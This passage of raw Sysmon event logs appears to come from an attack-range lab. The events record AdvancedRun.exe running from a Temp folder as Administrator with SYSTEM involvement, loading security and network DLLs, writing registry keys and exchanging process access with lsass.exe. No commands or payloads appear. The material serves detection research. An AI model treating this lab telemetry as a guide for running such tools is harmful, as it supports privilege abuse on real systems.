ata\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068976Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.362{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004068975Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.362{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004068974Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.362{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004068516Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:06.618{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleacc.dll7.2.14393.4169 (rs1_release.210107-1130)Active Accessibility Core ComponentMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEACC.DLLMD5=0C5492DFFA271BC1912BADFEBB497907,SHA256=536C445B9D489749547FAC1D0B01AF7F430BBFE31BCD2924E7DB3BFE66785452trueMicrosoft WindowsValidATTACKRANGE\Administrator 13241300x80000000000000004068488Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:10:05.017{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 734700x80000000000000004068486Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:05.004{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\samlib.dll10.0.14393.4530 (rs1_release.210705-0736)SAM Library DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSAMLib.DLLMD5=1029851F233A4FFD537D7B924F6078E9,SHA256=48FAA459585093FD2423A991B264219E5D7E0D37328D5CE6BDA917AB02607E31trueMicrosoft WindowsValidATTACKRANGE\Administrator 13241300x80000000000000004068463Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:10:05.012{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 12241200x80000000000000004068461Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:10:05.010{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004068460Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:10:05.010{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004068459Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:10:05.009{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004068458Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:10:05.009{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator 13241300x80000000000000004068457Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:10:05.008{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 734700x80000000000000004068440Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.998{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\samcli.dll10.0.14393.0 (rs1_release.160715-1616)Security Accounts Manager Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSAMCLI.DLLMD5=F67DFB27AACE637BEA56D3EB0726B943,SHA256=3663C2F3579BEBAF433AF101902ADA3FF87A3A6005F0AF77D1894458286E3656trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004068426Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.993{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004068425Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.993{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004068424Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.993{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=12ED40D048D0F5F44D3877936A1B7E8B,SHA256=8E652B0663D0F0C6BFE7102329C9A84FB1E937273E51F8FF0FC3469350AF5C41trueMicrosoft WindowsValidATTACKRANGE\Administrator 13241300x80000000000000004068423Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:10:04.991{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 12241200x80000000000000004068422Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:10:04.991{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFoldersATTACKRANGE\Administrator 12241200x80000000000000004068421Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:10:04.991{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpaceATTACKRANGE\Administrator 734700x80000000000000004068420Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.203{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=DDB56B83B18735F13FD1CBEF877E9DB0,SHA256=C5EF7185888F971CFA486B64D71514512C1CCBAB8C5A1D8610CAE54476407126trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068419Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.203{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\urlmon.dll11.00.14393.4770 (rs1_release.211101-1440)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=31A5C5B3C53CA5692BDE66730F5F09A9,SHA256=829D456F894EDBBC4F0EC02627788D31801743BB047D6FD100BE05F0CBCFB2E1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068418Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.199{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives Library (Wow64)Microsoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=80F9B9D2B1258D35F129D9210DC9CE20,SHA256=9653E29AA9499123EBFA49C4BA69E345F8A10029B00B790946DDFE040436EF6DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068417Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.199{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\wkscli.dll10.0.14393.4886 (rs1_release.220104-1735)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3E8769CD76B02894C3881018E0F9334C,SHA256=9DE69FDC7C3FE2ED664F68191CC92367B377FC096E42E2895FBF50D98D150A5CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068416Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.198{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=A612555310B7F2A688FA57C7C10615BC,SHA256=028B8BA6A6CF74776C8E4F7485BB7973DE25242F292F837D78AB9CFCC3E8AC90trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068415Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.197{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\winhttp.dll10.0.14393.4467 (rs1_release.210604-1844)Windows HTTP ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationwinhttp.dllMD5=F5FF215A5AE295644FE12BEAF6B75D00,SHA256=714EEB3B620CC9E368813728B1D247684519A3181211CDB5FCC37451F9BC2B96trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068414Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.192{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\netapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=B7B1A7C51A29273242E59A7AEC3CF193,SHA256=474C74D69EFC73F999687E998E9B05EF0E6A8F78A1A8E89D5E390411E4B91C05trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068413Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.192{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\iertutil.dll11.00.14393.4770 (rs1_release.211101-1440)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=C75F602912711A5B1270583E08F08C44,SHA256=571BBC3AD8076548129046D7432FB703235F0F6145109C15C0356C874985C239trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068412Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.191{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ieframe.dll11.00.14393.4886 (rs1_release.220104-1735)Internet BrowserInternet ExplorerMicrosoft CorporationIEFRAME.DLLMD5=7391061488EF087EC8B923263F5901E3,SHA256=5434336F96071153401C0616C4DCCA942D259EC97A102DBF590CA401F2E6EBA1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068397Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:03.985{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\actxprxy.dll10.0.14393.3808 (rs1_release.200707-2105)ActiveX Interface Marshaling LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationActXPrxy.dllMD5=CA7A58C10B61327C283100DD9277811A,SHA256=13D357E647DB3DFDFE35C56E4CC78244B35647CCA53D34F94F318DA7C848E09FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 12241200x80000000000000004068386Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:10:03.993{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFoldersATTACKRANGE\Administrator 12241200x80000000000000004068385Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:10:03.990{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpaceATTACKRANGE\Administrator 734700x80000000000000004068366Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:03.917{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.14393.4886_none_f67b299ef24e3cc8\GdiPlus.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft GDI+Microsoft® Windows® Operating SystemMicrosoft CorporationgdiplusMD5=3033965E4D4268DA640BBD453A75C6AB,SHA256=C568E3A1429BE3EAF98B309B4E0A3E940FB00ACFB7C73ADF92947A4B61650490trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068355Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:03.933{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=21062367FEB4D61857A65449EA516260,SHA256=FA481B495A9FE2E3E78173C9B065E4292911A1CD403D90A03058A54309366D17trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068336Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:03.864{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\wpdshext.dll10.0.14393.4169 (rs1_release.210107-1130)Portable Devices Shell ExtensionMicrosoft® Windows® Operating SystemMicrosoft CorporationWpdShExt.dllMD5=CD64A4E76AE86A8F150A0887A989490E,SHA256=D68D76FF62932D6202E0476172E9CAF135B4DD8E224895436A4AB99FDFB2433FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068309Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:03.811{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\DevDispItemProvider.dll10.0.14393.0 (rs1_release.160715-1616)DeviceItem inproc devquery subsystemMicrosoft® Windows® Operating SystemMicrosoft CorporationDevDispItemProvider.dllMD5=4FE46B3CD310664F540E4712103570E1,SHA256=D08940F1AE6F9B63872763E14950ADCACBA34BFC8ADB070563BF6FDA6E17E955trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068291Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:03.796{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\PlayToDevice.dll10.0.14393.4169 (rs1_release.210107-1130)PLAYTODEVICE DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPlaytoDevice.dllMD5=171ADC2789D5DC6B6316A0C9060419E4,SHA256=67E15E6F78A4777B312641F2D9CFCB1CB2B1F9784F75321155126B3038892DB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068261Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:03.775{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dlnashext.dll10.0.14393.4169 (rs1_release.210107-1130)DLNA Namespace DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationdlnashext.dllMD5=BA4EF83084B94D36767C9413812E01BD,SHA256=F77B664AC17417F5066805CF880769DE6159F7BF2BB60BF25284C23FAA089AEAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004068245Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:03.797{834264DD-DAE6-61EA-0D00-000000002702}876136C:\Windows\system32\svchost.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004068240Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:03.765{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=C5114D5A60467157B35D494D927325AB,SHA256=BE91B4149E5C074DE9055BF3914EF746F9776C2771BEA9E0336867A82A827C0DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004068084Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.468{834264DD-DB11-61EA-9500-000000002702}4283148C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068083Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 